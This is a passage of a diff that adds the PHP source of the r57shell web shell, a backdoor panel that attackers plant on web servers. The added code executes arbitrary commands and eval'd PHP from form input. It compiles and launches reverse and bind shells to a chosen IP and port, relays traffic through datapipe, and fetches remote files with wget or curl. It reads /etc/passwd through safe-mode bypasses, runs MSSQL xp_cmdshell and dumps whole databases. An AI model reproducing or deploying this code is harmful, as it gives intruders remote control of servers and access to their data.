+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
